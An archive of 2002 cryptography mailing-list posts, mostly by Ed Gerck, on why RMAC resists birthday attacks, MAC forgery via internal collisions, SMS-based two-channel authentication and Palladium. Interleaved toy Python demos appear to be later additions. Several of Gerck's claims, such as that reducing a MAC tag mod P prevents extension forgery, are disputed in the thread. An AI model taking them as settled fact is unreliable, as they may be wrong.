> > That is not the reason it was devised. The reason is to prevent a birthday
> > attack for 2^(t/2) tries on a MAC using a t-bit key. Needless to say, it also
> > makes it harder to try a brute-force attack.
>
> RMAC was devised for the reason I stated, as it says in the last quote from
> the paper above. The salt is there to make the cost of the extension forgery
> attack more expensive because the birthday surprise shows that just the number
> of bits in the cipher block may not make it expensive enough without a salt.
> The key size is not relevant to the "birthday attack" (actually extension
> forgery attack) as shown in the table where the work factor expressed as a
> function of the block length and the salt length, not the key size.

A minor nit, but sometimes looking into why things were devised is helpful.
What I explained can be found in
http://csrc.nist.gov/encryption/modes/workshop2/report.pdf
and especially useful is the segment:

The RMAC algorithm was a refinement of the DMAC algorithm in which a random bit
string was exclusive-ORed into the second key and then appended to the resulting MAC
to form the tag. The birthday paradox in principle was no longer relevant, for, say,
the AES with 128 bit keys, because the tag would be doubled to 256 bits. Joux presented
his underlying security model and the properties that he had proven for RMAC: the
number of queries that bounded the chance of a forgery was relatively close to the
number of 128 bit keys.
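The construction described in that segment can be sketched roughly as follows.
Note this is an illustration only: the "block cipher" is a hash-based stand-in,
not AES, and the keys and block size are made up.

```python
import hashlib
import os

BLOCK = 16  # 128-bit blocks, as with AES

def toy_encrypt(key, block):
    # Stand-in for a block cipher, for illustration only -- NOT a real PRP.
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_mac(key, msg):
    # Pad with 0x80 then zeros to a block boundary, then CBC-chain.
    msg += b"\x80" + b"\x00" * ((-len(msg) - 1) % BLOCK)
    state = bytes(BLOCK)
    for i in range(0, len(msg), BLOCK):
        state = toy_encrypt(key, xor(state, msg[i:i + BLOCK]))
    return state

def rmac(k1, k2, msg, salt=None):
    # DMAC is E_{K2}(CBC-MAC_{K1}(msg)); RMAC XORs a fresh random salt R
    # into K2 and appends R to the MAC, doubling the transmitted tag.
    r = os.urandom(BLOCK) if salt is None else salt
    return toy_encrypt(xor(k2, r), cbc_mac(k1, msg)) + r
```

The verifier recomputes the tag from the appended salt; an attacker collecting
tags faces a different effective second key per message, which is what blunts
the birthday-based extension forgery.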

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> [EMAIL PROTECTED]
> > I want to understand the assumptions (threat models) behind the
> > work factor estimates. Does the above look right?
>
> I just realized something about the salt in the RMAC algorithm, although it
> may have been obvious to everyone else:
>
> RMAC is equivalent to a HMAC hash-based MAC algorithm, but using a block
> cipher.

No -- these are all independent things. One can build an RMAC with SHA-1.
An RMAC does not have to use an HMAC scheme. One can also have an
HMAC hash-based MAC algorithm using a block cipher that is not an RMAC.

> The paper states that it is for use instead of HMAC in circumstances
> where for some reason it is easier to use a block cipher than a cryptographic
> hash.

That is not the reason it was devised. The reason is to prevent a birthday attack
for 2^(t/2) tries on a MAC using a t-bit key. Needless to say, it also makes it
harder to try a brute-force attack.

Cheers,
Ed Gerck





-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Wei Dai wrote:

> On Tue, Oct 22, 2002 at 12:31:47PM -0700, Ed Gerck wrote:
> > My earlier comment to bear applies here as well -- this attack can be avoided
> > if only a subset of the MAC tag  is used
>
> I can't seem to find your earlier comment. It probably hasn't gone through
> the mailing list yet.
>
> I don't see how the attack is avoided if only a substring of the MAC tag
> is used. (I assume you mean substring above instead of subset.)

Yes, subset -- not a string with the last N characters dropped. For example,
you can calculate the subset as MAC mod P, for P smaller than
2^(bits in the MAC tag).
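A small illustration of the point (hypothetical key and parameters, with
HMAC-SHA256 standing in for the MAC): two messages whose transmitted mod-P
tags collide, yet whose full tags -- and hence internal states -- differ.

```python
import hashlib
import hmac

KEY = b"shared-secret"   # hypothetical shared key
P = 2**16                # transmit only MAC mod P, a "subset" of the tag

def full_tag(msg):
    return int.from_bytes(hmac.new(KEY, msg, hashlib.sha256).digest(), "big")

def sent_tag(msg):
    return full_tag(msg) % P

# By the birthday bound, ~sqrt(P) messages usually suffice; the pigeonhole
# principle guarantees a collision within P + 1 distinct messages.
seen = {}
m1 = m2 = None
for i in range(P + 2):
    m = b"msg-%d" % i
    t = sent_tag(m)
    if t in seen:
        m1, m2 = seen[t], m
        break
    seen[t] = m

# The attacker sees equal transmitted values (A = B), yet the full tags
# differ (a != b): no internal collision can be inferred.
assert sent_tag(m1) == sent_tag(m2)
assert full_tag(m1) != full_tag(m2)
```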

> The
> attacker just needs to find messages x and y such that the truncated MAC
> tags of x|0, x|1, ..., x|n, matches those of y|0, y|1, ..., y|n, and this
> will tell him that there is an internal collision between x and y.

No. The attacker gets A and B, and sees that A = B. This does not mean
that a=b in  A = a mod P and B = b mod P.  The internal states are possibly
different even though the values seen by the attacker are the same.

> n only
> has to be large enough so that the total length of the truncated MAC tags
> is greater than the size of the internal state of the MAC.
>
> > OR if the message to be hashed has
> > a fixed length defined by the issuer. Only one of these conditions is needed.
>
> No I don't think that works either. The attacker can try to find messages
> x and y such that MAC(x|0^n) = MAC(y|0^n) (where 0^n denotes enough zeros
> to pad the messages up to the fixed length).  Then there is a good
> chance that the internal collision occured before the 0's and so
> MAC(x|z)  = MAC(y|z) for all z of length n.

Why do you think there is a "good chance"?

Note that all messages for which you can get a MAC have some fixed message
length M. The attacker cannot leverage a MAC value to calculate the state of
an (M+1)-length message -- exactly because this is prevented by making all
messages have length M.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


[EMAIL PROTECTED] wrote:

> On Tue, 22 Oct 2002, Ed Gerck wrote:
>
> > Short answer:  Because the MAC tag is doubled in size.
>
> I know, but this is not my question.

;-) your question was "Why is RMAC resistant to birthday attacks?"

> > Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
> > only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
> > two messages with the same tag, i.e., a “collision,” from which forgeries
> > could easily be constructed.
>
> So the threat model assumes that there is a MAC oracle. What is a
> practical realization of such an oracle? Does Eve simply wait for (or
> entice) Alice to send enough (intercepted) messages to Bob?

Eve may just watch traffic that comes into her company's servers, knowing
the back-end plain text messages. No need to watch external networks. Eve
may also be, for example, one of those third-party monitoring services that
monitor traffic inside enterprise's networks for the purpose of "assuring security".

> Are there any other birthday attack scenarios for keyed MAC?

A birthday attack requires 2^(t/2) values, which looks surprisingly low -- hence
the name "paradox" (BTW, this attack provides the mathematical model behind the
game of finding people with the same birthday at a party, which works for a
surprisingly low number of people). If you can get 2^(t/2) values, the attack
works.
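The party version is easy to check by simulation (a sketch; trial count chosen
arbitrarily):

```python
import random

def shared_birthday_rate(n_people, trials=20000, days=365):
    # Fraction of trials in which at least two of n_people share a birthday.
    hits = 0
    for _ in range(trials):
        birthdays = [random.randrange(days) for _ in range(n_people)]
        if len(set(birthdays)) < n_people:
            hits += 1
    return hits / trials

# Roughly sqrt(365) ~ 19 people is the scale; 23 already give about even odds.
print(shared_birthday_rate(23))
```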

> In many
> applications the collection sufficiently many messages between Alice and
> Bob is simply out of the question. In such cases if Eve cannot mount the
> attack independently and cannot collect 2^(n/2) messages from Alice to
> Bob, presumably RMAC does not offer an advantage over any other keyed MAC.

In an Internet message, datagrams can be inserted, dropped, duplicated, tampered
with or delivered out of order at the network layer (and often at the link layer). TCP
implements a reliable transport mechanism  and copes with the datagram unreliability
at the lower layers. However, TCP is unable to cope with a fraudulent datagram that is
crafted to pass TCP's protocol checks and is inserted into the datagram stream. That
datagram will be accepted by TCP and passed on to higher layers. A cryptographic
system operating  below TCP is needed to avoid this attack and filter out the deviant
datagrams -- and that's where you would use a MAC, if you want to protect each
datagram. It's not difficult, thus, to have more than 2^32 MACs in one message or
in a series of messages.

This is a scenario where it is not so difficult for an attacker to forge an acceptable
MAC for a datagram that was not sent in a given sequence, possibly tampering with
the upper-layer message and also making it more vulnerable to denial-of-service attacks.
Note that having a MAC above TCP does not prevent this attack, even though it can
detect it (and thus lead to a denial-of-service).

> I am not confused by the RMAC algorithm or the associated work factor
> estimates; I want to understand the assumptions (threat models) behind the
> work factor estimates. Does the above look right?

If birthday attack is a concern, RMAC is helpful. If not, then not.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Wei Dai wrote:

> On Tue, Oct 22, 2002 at 11:09:41AM -0700, bear wrote:
> > Now Bob sends Alice 2^32 messages (and Alice's key-management
> > software totally doesn't notice that the key has been worn to
> > a nub and prompt her to revoke it).  Reviewing his files, Bob
> > finds that he has a January 21 document and a September 30
> > document which have the same MAC.
> >
> > What does Bob do now?  How does this get Bob the ability to
> > create something Alice didn't sign, but which has a valid MAC
> > from Alice's key?
>
> Call the Jan 21 document x, and the Sept 30 document y. Now Bob knows
> MAC_Alice(x | z) = MAC_Alice(y | z) for all z, because the internal states
> of the MAC after processing x and y are the same and therefore will remain
> equal given identical suffixes.

My earlier comment to bear applies here as well -- this attack can be avoided
if only a subset of the MAC tag is used OR if the message to be hashed has
a fixed length defined by the issuer. Only one of these conditions is needed.
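The suffix property quoted above can be demonstrated on a toy iterated MAC
whose tag exposes its entire (deliberately tiny) internal state -- an
illustration with made-up parameters, not a real MAC:

```python
import hashlib

def toy_mac(key, msg):
    # Iterated MAC with a 16-bit internal state; the tag IS the final state.
    state = key
    for byte in msg:
        state = hashlib.sha256(state + bytes([byte])).digest()[:2]
    return state

key = b"\xab\xcd"
seen = {}
x = y = None
for i in range(2**16 + 2):  # pigeonhole: a state collision within 2^16 + 1 msgs
    m = b"m%d" % i
    t = toy_mac(key, m)
    if t in seen:
        x, y = seen[t], m
        break
    seen[t] = m

# Once the internal states collide, every common suffix z keeps the tags equal.
for z in (b"", b"|suffix", b"|another suffix"):
    assert toy_mac(key, x + z) == toy_mac(key, y + z)
```

With real MACs the internal state is larger and (in HMAC or with truncation)
partly hidden from the tag, which is exactly what the conditions above exploit.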

> So he can get a MAC on x | z and
> it's also a valid MAC for y | z, which Alice didn't sign.  This applies
> for CBC-MAC, DMAC, HMAC, and any another MAC that is not randomized or
> maintains state (for example a counter) from message to message.

Except as noted above, which is easy to implement.

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


bear wrote:

> On Tue, 22 Oct 2002, Ed Gerck wrote:
>
> >Short answer:  Because the MAC tag is doubled in size.
> >
> >Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
> >only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
> >two messages with the same tag, i.e., a “collision,” from which forgeries
> >could easily be constructed.
>
> This is a point I don't think I quite "get". Suppose that I have
> a MAC "oracle" and I bounce 2^32 messages off of it.  With a
> 64-bit MAC, the odds are about even that two of those messages
> will come back with the same MAC.
>
> But why does that buy me the ability to "easily" make a forgery?

;-) please note that you already have one forgery...

BTW, it is important to look at the size of the internal chaining variable.
If it is 128 bits, attacks with a 2^64 burden (the birthday bound on the
chaining variable) would likely work. However, if only a subset of the MAC tag
is used OR if the message to be hashed has a fixed length defined by the issuer,
this is not relevant. Only one of these conditions is needed.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck


Sidney Markowitz wrote:

> "bear" <[EMAIL PROTECTED]> asked:
> > But why does that buy me the ability to "easily" make a forgery?
>
> It doesn't. As described in the paper all you can do with it is the following:
>
> Mallory discovers that a message from Alice "Buy a carton of milk" and another
> message from Alice "Get a dozen eggs" are sent with the same salt and have the
> same MAC, ...

It does too (as you can read in the paper). BTW, the "easily" applies to the case
WITHOUT the salt -- i.e., without RMAC. But that's why RMAC was proposed ;-)

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Why is RMAC resistant to birthday attacks?

2002-10-22 Thread Ed Gerck
Short answer:  Because the MAC tag is doubled in size.

Longer answer: The “birthday paradox” says that if the MAC tag has t bits,
only 2^(t/2) queries to the MAC oracle are likely  needed in order to discover
two messages with the same tag, i.e., a “collision,” from which forgeries
could easily be constructed. In RMAC, t is increased to 2t, so that
2^(2t/2) = 2^t and there is no reduction in the number of queries due to the
"birthday paradox". For example, for AES with 128-bit keys, the number of
queries that bounds the chance of a forgery is still close to 2^128. The
penalty is doubling the size of the MAC tag.

BTW, for MAC systems where collisions are prevented a priori, the
"birthday paradox" does not apply.

Cheers,
Ed Gerck

[EMAIL PROTECTED] wrote:

> The RMAC FIPS draft does not appear to explicitly state when RMAC is
> useful. What is the scenario in which (presumably unlike some other keyed
> MAC algorithms) RMAC is resistant to birthday attacks? More broadly for an
> arbitrary keyed MAC (in a plausible application!) how does the birthday
> attack come into play?
>
> With unkeyed message digests encrypted by a public key, the attacks are
> clear, Alice sends Bob message A, Bob agrees to message A, and signs it.
> Later Alice claims that Bob signed message B. The birthday paradox
> helps Alice because she can generate lots of minor variants of each
> message, generate ~sqrt(2^n) hashes of each and have a good shot at
> finding a collision.
>
> With keyed MACs Alice and Bob share the same secretkeys, either can
> freely generate messages with correct MAC values, so the MAC cannot be
> used as evidence to a third party that Alice is the signer of the
> message.
>
> In this case the attacker is clearly not either Alice or Bob. So Eve wants
> to convince Bob that a message really is from Alice. What does Eve do?
> Does Eve somehow entice Alice to send ~sqrt(2^n) messages to Bob? How does
> the birthday attack come into play when the attacker cannot independently
> test potential collisions?
>
> Please pardon the naive question, I just want to understand the premises
> of the problem to which RMAC is a solution.
>
> --
> Viktor.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Microsoft marries RSA Security to Windows

2002-10-15 Thread Ed Gerck

[I'm reducing the reply level to 2, for context please see former msg]

"Arnold G. Reinhold" wrote:

> At 8:40 AM -0700 10/11/02, Ed Gerck wrote:
> >Cloning the cell phone has no effect unless you also have the credentials
> >to initiate the transaction. The cell phone cannot initiate the authentication
> >event. Of course, if you put a gun to the user's head you can get it all but
> >that is not the threat model.
>
> If we're looking at high security applications, an analysis of a
> two-factor system has to assume that one factor is compromised (as
> you point out at the end of your response). I concede that there are
> large classes of low security applications where using a cell phone
> may be good enough, particularly where the user may not be
> cooperative. This includes situations where users have an economic
> incentive to share their login/password, e.g. subscriptions, and in
> privacy applications ("Our logs show you accessed Mr. Celebrity's
> medical records, yet he was never your patient." "Someone must have
> guessed my password." "How did they get your cell phone too?")

I like the medical record dialogue. But please note that what you wrote is
much stronger than asking "How did they get your hardware token too?"
because you could justifiably go for days without noticing that the hardware
token is missing but you (especially if you are an MD) would almost
immediately notice that your cell phone is missing. Traffic logs and call
parties for received and dialed calls could also be used to prove that you
indeed used your cell phone both before and after the improper access. Also,
if you lose your cell phone you are in a lot more trouble.

The point made here is that the aggregate value associated with the cell
phone used for receiving a SMS one-time code is always higher than that
associated with the hardware token (it is token +), hence its usefulness
in the security scheme. Denying possession of the cell phone would be
harder to do -- and easier to disprove -- than denying possession of the
hardware token.

> Here the issue is preventing the user from cloning his account or denying
> its unauthorized use, not authentication.

The main objective of two-channel, two-factor authentication (as we
are discussing) is to prevent unauthorized access EVEN if the user's
credentials are compromised. This includes what you mentioned, in addition
to assuring authentication (i.e., preventing the user from cloning his account;
allowing enterprises to deny the unauthorized use of user's accounts).

Now, why should the second channel be provided ONLY by a hardware
token?  There is no such need, or security benefit.

The second channel can be provided by a hardware token, by an SMS-
enabled cell phone, by a pager or by ANY other means that creates a
second communication channel that is at least partially independent from
the first one. There is no requirement for the channels to be 100%
independent. Even though 100% independence is clearly desirable and can
be provided in some systems, it is hard to accomplish for a number of reasons
(indexing being one of them). In RSA SecurID, for example, the user's
PIN (which is a shared secret) is used both in the first channel (authenticating
the user) and in the second channel (authenticating the passcode). Note also
that in SecurID systems without a PIN pad, the PIN is simply prefixed in plain
text to the random code and both are sent in the passcode.

The second channel could even be provided, for example, by an HTTPS (no
MITM) response in the same browser session (where the purported user
entered the correct credentials) if the response can be processed by an
independent means that is inaccessible to others except the authorized user
(for example, a code book, an SMS query-response, a crypto calculator, etc.)
and the result fed back into the browser (i.e., as a challenge response).

>
> >
> >A local solution on the PDA side is possible too, and may be helpful where
> >the mobile service may not work. However, it has less potential for wide
> >use. Today, 95% of all cell phones used in the US are SMS enabled.
>
> What percentage are enabled for downloadable games? A security
> program would be simpler than most games.  It might be feasible to
> upload a new "game" periodically for added security.

There is nothing downloaded to the cell phone.  Mobile RSA SecurID and
NMA ZSentryID are zero-footprint applications.

BTW, requiring the download of a game or code opens another can of worms
-- whether the code is trusted by both sender and receiver (being trusted by
just one of them is not enough).

> >> 2. Even if the phone is tamperproof, SMS messages can be intercepted.
> >> I can imagine a man-in-the-middle attack where the attacker cuts 

Re: Microsoft marries RSA Security to Windows

2002-10-15 Thread Ed Gerck
You can also use email.

> 9. Improved technology should make authentication tokens even more
> attractive. For one thing they can be made very small and waterproof.
> Connection modes like USB and Bluetooth can eliminate the need to
> type in a code, or allow the PIN to be entered directly into the
> token (my preference).

It's costly, makes you carry an additional device and -- most importantly
-- needs that pesky interface at the other end.

> 10. There is room for more innovative tokens. Imagine a finger ring
> that detects body heat and pulse and  knows if it has removed. It
> could then refuse to work, emit a distress code when next used or
> simply require an additional authentication step to be reactivated.
> Even implants are feasible.

There is always room for evolution, and that's why we shan't run out of
work ;-)

However, not everyone wants to have an implant or carry a ring on their
finger -- which can be scanned and the subject targeted for a more serious
threat. My general remark on biometrics applies here -- when you are the
key (e.g., your live fingerprint), key compromise has the potential to be
much more serious and harmful to you.

BTW, what is the main benefit of two-channel (as opposed to just two-factor)
authentication? It is that security can be assured even if the user's
credentials are compromised -- for example, by passwords written on sticky
notes on the screen or under the keyboard, by weak passwords, or by passwords
silently sniffed by malicious software/hardware. These problems are very
thorny today and really have no solution but to add another, independent
communication channel. Trust in authentication effectiveness depends on using
more than one channel, which is a general characteristic of trust
( http://nma.com/papers/it-trust-part1.pdf  )

Cheers,
Ed Gerck


>
>
> Arnold Reinhold
>
> At 8:56 AM -0700 10/9/02, Ed Gerck wrote:
> >Tamper-resistant hardware is out, second channel with remote source is in.
> >Trust can be induced this way too, and better. There is no need for
> >PRNG in plain
> >view, no seed value known. Delay time of 60 seconds (or more) is fine because
> >each one-time code applies only to one page served.
> >
> >Please take a look at:
> >http://www.rsasecurity.com/products/mobile/datasheets/SIDMOB_DS_0802.pdf
> >
> >and http://nma.com/zsentry/
> >
> >Microsoft's move is good, RSA gets a good ride too, and the door may open
> >for a standards-based two-channel authentication method.
> >
> >Cheers,
> >Ed Gerck
> >
> >"Roy M.Silvernail" wrote:
> >
> >> On Tuesday 08 October 2002 10:11 pm, it was said:
> >>
> >> > Microsoft marries RSA Security to Windows
> >> > http://www.theregister.co.uk/content/55/27499.html
> >>
> >> [...]
> >>
> >> > The first initiatives will centre on Microsoft's licensing of RSA SecurID
> >> > two-factor authentication software and RSA Security's
> >>development of an RSA
> >> > SecurID Software Token for Pocket PC.
> >>
> >> And here, I thought that a portion of the security embodied in a SecurID
> >> token was the fact that it was a tamper-resistant, independent piece of
> >> hardware.  Now M$ wants to put the PRNG out in plain view, along with its
> >> seed value. This cherry is just begging to be picked by some blackhat,
> >> probably exploiting a hole in Pocket Outlook.
> >>
> >


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Microsoft marries RSA Security to Windows

2002-10-10 Thread Ed Gerck

Tamper-resistant hardware is out, second channel with remote source is in.
Trust can be induced this way too, and better. There is no need for PRNG in plain
view, no seed value known. Delay time of 60 seconds (or more) is fine because
each one-time code applies only to one page served.

Please take a look at:
http://www.rsasecurity.com/products/mobile/datasheets/SIDMOB_DS_0802.pdf

and http://nma.com/zsentry/

Microsoft's move is good, RSA gets a good ride too, and the door may open
for a standards-based two-channel authentication method.

Cheers,
Ed Gerck

"Roy M.Silvernail" wrote:

> On Tuesday 08 October 2002 10:11 pm, it was said:
>
> > Microsoft marries RSA Security to Windows
> > http://www.theregister.co.uk/content/55/27499.html
>
> [...]
>
> > The first initiatives will centre on Microsoft's licensing of RSA SecurID
> > two-factor authentication software and RSA Security's development of an RSA
> > SecurID Software Token for Pocket PC.
>
> And here, I thought that a portion of the security embodied in a SecurID
> token was the fact that it was a tamper-resistant, independent piece of
> hardware.  Now M$ wants to put the PRNG out in plain view, along with its
> seed value. This cherry is just begging to be picked by some blackhat,
> probably exploiting a hole in Pocket Outlook.
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: unforgeable optical tokens?

2002-09-22 Thread Ed Gerck



bear wrote:

> Anyway; it's nothing particularly great for remote authentication;
> but it's *extremely* cool for local authentication.

Local authentication still has several optical issues that need to be addressed,
which may limit the field usefulness of a device based on laser speckle.

For example, optical noise from both diffraction and interference effects is a
large problem -- a small scratch, dent, fiber, or other mark (even invisible,
but producing an optical phase change) could change all or most of
the speckle field. The authors report that a 0.5mm hole produces a large
overall change -- which is easily understood, since the smaller the defect,
the larger its spatial effect (Fourier transform).

But temperature/humidity/cycle differences might be worse -- any dilation or
contraction created by a temperature/humidity/cycle difference between recording
time (in lab conditions) and the actual validation time (in field conditions) would
change the entire speckle field in a way which is not "geometric" -- you can't just
scale it up and down to search for a fit.

Also, one needs to recall that this is not a random field -- this IS a speckle field.
There is a definitely higher probability of bunching at dark and bright areas
(because of the scatterer's form, sine-function properties, laser coherence length,
etc.). This intrinsic regularity can be used to reduce the search space to one much
smaller than what I saw suggested.  Taking into account the loss of resolution
from vibration and positioning would further reduce the search space.

Finally, the speckle field will show autocorrelation properties related to the sphere's
size and size distribution, which will further reduce randomness. In fact, this is a
standard application of speckle: to measure the diameter statistics of small spheres.
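As a rough classical illustration of that last point: correlated "grain" in a field shows up immediately in its autocorrelation, unlike white noise. This is a toy sketch, not an optics simulation -- the moving-average stand-in for a speckle intensity trace is my own assumption.

```python
import random

def autocorr(xs, lag):
    # Normalized sample autocorrelation at a given lag.
    n = len(xs)
    mean = sum(xs) / n
    var = sum((x - mean) ** 2 for x in xs) / n
    cov = sum((xs[i] - mean) * (xs[i + lag] - mean)
              for i in range(n - lag)) / (n - lag)
    return cov / var

random.seed(42)
raw = [random.gauss(0, 1) for _ in range(20000)]

# Crude stand-in for a speckle trace: values correlated over a few
# samples. The window w sets the "grain" size, playing the role of
# the sphere-size distribution in the real speckle field.
w = 5
speckle = [sum(raw[i:i + w]) / w for i in range(len(raw) - w)]

# The correlated field is far from white noise at short lags:
print(round(autocorr(raw, 1), 2), round(autocorr(speckle, 1), 2))
```

An attacker who knows the grain statistics can exploit exactly this kind of short-range structure to prune the search space.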

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-18 Thread Ed Gerck



"Peter N. Biddle" wrote:

> Hey Ed - I think that we may be in agreement. Most of what you say below
> makes sense to me.

What you said also looks good.

> I'd love to see your papers.

A recent summary is at  http://nma.com/papers/gerck_on_trust.pdf

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-18 Thread Ed Gerck

Peter:

The question of "what is trust" might fill this listserver for months.
But, if we want to address some of the issues that Pd (and, to some
extent, PKI) forces on us then we must be clear what we mean when
we talk about  trust in a communication system -- what is a trusted
certificate, a trusted computer? Trusted for what? What happens
when I connect two computers that are trusted on matters of X --
are they trusted together on matters of X, less or more? What do
we mean by trustworthy?

I can send you some of my papers on this but the conclusion I arrived
is that in terms of a communication process, trust has nothing to do with
feelings or emotions.

Trust is qualified reliance on information, based on factors independent of
that information.

In short, trust needs multiple, independent channels to be communicated.
Trust cannot be induced by self-assertions -- like, "trust me!"  or "trust Pd!"
More precisely, "Trust is that which is essential to a communication channel
but cannot be transferred using that channel."  Please see the topic “Trust Points”
by myself in “Digital Certificates: Applied Internet Security” by Jalal Feghhi,
Jalil Feghhi and Peter Williams, Addison-Wesley, ISBN 0-20-130980-7, pages
194-195, 1998.

That said, the option of being *able* to define your own signatures on what
you decide to trust does not preclude you from deciding to rely on someone
else's signature.  BTW, this has been used for some time with a hardened version
of Netscape, where the browser does not use *any* root CA cert unless you sign
it first.

Thanks for your nice  comment ;-)

Ed Gerck



Peter wrote:

> I disagree with your first sentence (I believe that Pd must be trustworthy
> for *the user*), but I like much of the rest of the first paragraph.
>
> I am not sure what value my mother would find in defining her own
> signatures. She doesn't know what they are, and would thus have no idea on
> who or what to trust without some help.
>
> What my mother might trust is some third party (for example she might trust
> Consumer's Union). We assumed we needed a structure which lets users
> delegate trust to people who understand it and who are investing in
> "branding" their take on the trustworthiness of a given "thing" (think UL
> label, Good Housekeepking Seal of Approval, etc.). I totally agree that some
> small segment of users will have an active interest in managing the trust on
> their machines directly (like, maybe, us) but any architecture that you want
> to be used by "normal" PC users needs to also let users delegate this
> managment to others who can manage it for users (just like we might decide
> to use others to manage our retirement funds, defend us in a court of law,
> or operate on our kidneys).
>
> To delegate trust, you need to start out trusting something to do that
> delegation. That's part of what Pd is addressing - Pd needs to be
> trustworthy enough so that when a user sets policy (eg "don't run any SW in
> Pd which isn't signed by the EFF" or "don't run any SW which isn't
> debuggable"), it is enforced.
>
> P
>
> - Original Message -
> From: "Ed Gerck" <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 17, 2002 2:51 PM
> Subject: Re: Cryptogram: Palladium Only for DRM
>
> >
> > It may be useful to start off with the observation that Palladium will not
> be
> > the answer for a platform that *the user* can trust.  However, Palladium
> > should raise awareness on the issue of what a user can trust, and what
> not.
> > Since a controling element has to lie outside the controled system, the
> solution
> > for a trustworthy system is indeed an independent module with processing
> > capability -- but which module the user should be able to control..
> >
> > This may be a good, timely opening for a solution  in terms of a "write
> code"
> > approach, where an open source trustworthy (as opposed to trusted)
> > secure execution module TSEM (e.g., based on a JVM with permission
> > and access management) could be developed and -- possibly -- burned on a
> > chip set for a low cost system. The TSEM would require user-defined
> > signatures to define what is trustworthy to *the user*, which would set a
> higher
> > bar for security when compared with someone else defining what is
> > trustworthy to the user.  The TSEM could be made tamper-evident, too.
> >
> > Note: This would not be in competition with NCipher's SEE, because
> NCipher's
> > product is for the high-end market and involves commercial warranties,
> > but NCipher's SEE module is IMO a good example.
> >
> > Comments?
> >
> > Ed Gerck
> >
> >
> >
> >
> > -
> > The Cryptography Mailing List
> > Unsubscribe by sending "unsubscribe cryptography" to
> [EMAIL PROTECTED]
> >


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Cryptogram: Palladium Only for DRM

2002-09-17 Thread Ed Gerck


It may be useful to start off with the observation that Palladium will not be
the answer for a platform that *the user* can trust.  However, Palladium
should raise awareness on the issue of what a user can trust, and what not.
Since a controlling element has to lie outside the controlled system, the solution
for a trustworthy system is indeed an independent module with processing
capability -- but one which the user should be able to control.

This may be a good, timely opening for a solution  in terms of a "write code"
approach, where an open source trustworthy (as opposed to trusted)
secure execution module TSEM (e.g., based on a JVM with permission
and access management) could be developed and -- possibly -- burned on a
chip set for a low cost system. The TSEM would require user-defined
signatures to define what is trustworthy to *the user*, which would set a higher
bar for security when compared with someone else defining what is
trustworthy to the user.  The TSEM could be made tamper-evident, too.

Note: This would not be in competition with NCipher's SEE, because NCipher's
product is for the high-end market and involves commercial warranties,
but NCipher's SEE module is IMO a good example.

Comments?

Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-03 Thread Ed Gerck



Jaap-Henk Hoepman wrote:

> On Mon, 02 Sep 2002 17:59:12 -0400 "John S. Denker" <[EMAIL PROTECTED]> writes:
> > The same applies even more strongly to quantum computing:
> > It would be nice if you could take a classical circuit,
> > automatically convert it to "the" corresponding quantum
> > circuit, with the property that when presented with a
> > superposition of questions it would produce "the"
> > corresponding superposition of answers.  But that cannot
> > be.  For starters, there will be some phase relationships
> > between the various components of the superposition of
> > answers, and the classical circuit provides no guidance
> > as to what the phase relationships should be.
>
> In fact you can! For any efficient classical circuit f there exists an
> efficient quantum circuit Uf that does exactly what you describe:
> when given an equal superposition of inputs it will produce the equal
> superposition of corresponding outputs.

Jaap-Henk,

a proof of existence does not allow one to automatically convert a classical
circuit to "the" corresponding quantum circuit, which was John's original
point. Devising QC algorithms from classical algorithms is unlikely to be
the best way to do it, either.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]



Re: Quantum computers inch closer?

2002-09-03 Thread Ed Gerck



David Wagner wrote:

> Ed Gerck  wrote:
> >The original poster is correct, however, in that a metric function can
> >be defined
> >and used by a QC to calculate the distance between a random state and an
> >eigenstate with some desired properties, and thereby allow the QC to define
